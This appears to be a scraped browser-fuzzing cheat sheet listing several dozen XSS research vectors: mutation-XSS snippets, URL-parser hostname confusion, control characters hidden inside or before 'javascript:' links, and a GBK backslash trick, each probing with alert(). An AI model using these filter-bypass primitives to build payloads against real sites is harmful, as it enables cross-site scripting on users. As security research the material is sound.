Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
<div id="x9"><span x="href=0x09>&bbb"></span></div>0x0D
<script>0x0D
window["x9"].innerHTML=window["x9"].innerHTML;0x0D
if (window["x9"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(9)0x0D
}0x0D
</script><div id="x10"><span x="href=
>&bbb"></span></div>0x0D
<script>0x0D
window["x10"].innerHTML=window["x10"].innerHTML;0x0D
if (window["x10"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(10)0x0D
}0x0D
</script><div id="x12"><span x="href=0x0C>&bbb"></span></div>0x0D
<script>0x0D
window["x12"].innerHTML=window["x12"].innerHTML;0x0D
if (window["x12"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(12)0x0D
}0x0D
</script><div id="x13"><span x="href=0x0D>&bbb"></span></div>0x0D
<script>0x0D
window["x13"].innerHTML=window["x13"].innerHTML;0x0D
if (window["x13"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(13)0x0D
}0x0D
</script><div id="x32"><span x="href= >&bbb"></span></div>0x0D
<script>0x0D
window["x32"].innerHTML=window["x32"].innerHTML;0x0D
if (window["x32"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(32)0x0D
}0x0D
</script>if (new URL("javascript0x09://xss.com").host=="xss.com"){alert(9)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript+://xss.com").host=="xss.com"){alert(43)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript-://xss.com").host=="xss.com"){alert(45)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript.://xss.com").host=="xss.com"){alert(46)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript0://xss.com").host=="xss.com"){alert(48)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
This vector shows what characters are allowed after a bigint
This vector shows what characters are allowed after a bigint
This vector shows what characters are allowed after a bigint
This vector shows what characters are allowed after a bigint
⟦09⟧x=123⟦09⟧0x0D
alert(9)This vector checks which characters are valid syntax before & after an assignment
x=123
0x0D
alert(10)This vector checks which characters are valid syntax before & after an assignment
0x0Bx=1230x0B0x0D
alert(11)This vector checks which characters are valid syntax before & after an assignment
0x0Cx=1230x0C0x0D
alert(12)This vector checks which characters are valid syntax before & after an assignment
0x0Dx=1230x0D0x0D
alert(13)This vector checks which characters are valid syntax before & after an assignment
This vector shows which characters are allowed after the throw statement.
This vector shows which characters are allowed after the throw statement.
This vector shows which characters are allowed after the throw statement.
const s = String.fromCodePoint(i);0x0D
if (!encodeURI(s).includes("%")) alert(i);0x0D
const s = String.fromCodePoint(i);0x0D
if (escape(s).includes("%")) alert(i);List of all characters that when passed through escape(), will be percent-encoded
const s = String.fromCodePoint(i);0x0D
if (encodeURI(s).includes("%")) alert(i);List of all characters that when passed through encodeURI(), will be percent-encoded
const s = String.fromCodePoint(i);0x0D
if (encodeURIComponent(s).includes("%")) alert(i);List of all characters that when passed through encodeURIComponent(), will be percent-encoded
try{0x0D
img = document.createElement("img");0x0D
img.src=`https://example.com:1@1`;0x0D
url = new URL(img.src);0x0D
if(url.hostname != "example.com"){0x0D
alert(64);0x0D
}0x0D
} catch{}Injection in src attribute PORT, characters that change hostname
if (new URL("https://google.com:10x090x09/endpoint").hostname!="google.com"){alert(9)}Characters appended at the end of PORT within URL, which yield a different HOST This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com:1##/endpoint").hostname!="google.com"){alert(35)}Characters appended at the end of PORT within URL, which yield a different HOST This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com:1///endpoint").hostname!="google.com"){alert(47)}Characters appended at the end of PORT within URL, which yield a different HOST This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com:100/endpoint").hostname!="google.com"){alert(48)}Characters appended at the end of PORT within URL, which yield a different HOST This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com:111/endpoint").hostname!="google.com"){alert(49)}Characters appended at the end of PORT within URL, which yield a different HOST This is just a simple modification of another fuzzing vector by hansmachine
try{0x0D
document.createElement(String.fromCodePoint(58));0x0D
alert(58)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
try{0x0D
document.createElement(String.fromCodePoint(95));0x0D
alert(95)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
try{0x0D
document.createElement(String.fromCodePoint(170));0x0D
alert(170)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
try{0x0D
document.createElement(String.fromCodePoint(181));0x0D
alert(181)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
<a href="https://0x09example2.com" id=x></a>This vectors show which characters are ignored at the start of the hostname.
<a href="https://
example2.com" id=x></a>This vectors show which characters are ignored at the start of the hostname.
<a href="https://0x0Dexample2.com" id=x></a>This vectors show which characters are ignored at the start of the hostname.
<a href="https:///example2.com" id=x></a>This vectors show which characters are ignored at the start of the hostname.
<a href="https://@example2.com" id=x></a>This vectors show which characters are ignored at the start of the hostname.
<script>"\\"-alert(92)//"</script>This vector demonstrates that certain characters consume backslashes when using a GBK charset
if(new URL("https" + String.fromCharCode(i) + "//example.com").host == "example.com") alert(i)anchor.href="https://psres.net"+String.fromCodePoint(35)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(35)0x0D
}This vector shows what characters cause an external URL when used before an @
anchor.href="https://psres.net"+String.fromCodePoint(47)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(47)0x0D
}This vector shows what characters cause an external URL when used before an @
anchor.href="https://psres.net"+String.fromCodePoint(63)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(63)0x0D
}This vector shows what characters cause an external URL when used before an @
anchor.href="https://psres.net"+String.fromCodePoint(92)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(92)0x0D
}This vector shows what characters cause an external URL when used before an @
<a href="java0x09script:test.com/" id="test"></a>Characters that can be inside the javascript protocol in html
<a href="java
script:test.com/" id="test"></a><a href="java0x0Dscript:test.com/" id="test"></a>Characters that can be inside the javascript protocol in html
<a href="0x01javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x02javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x03javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x04javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x05javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.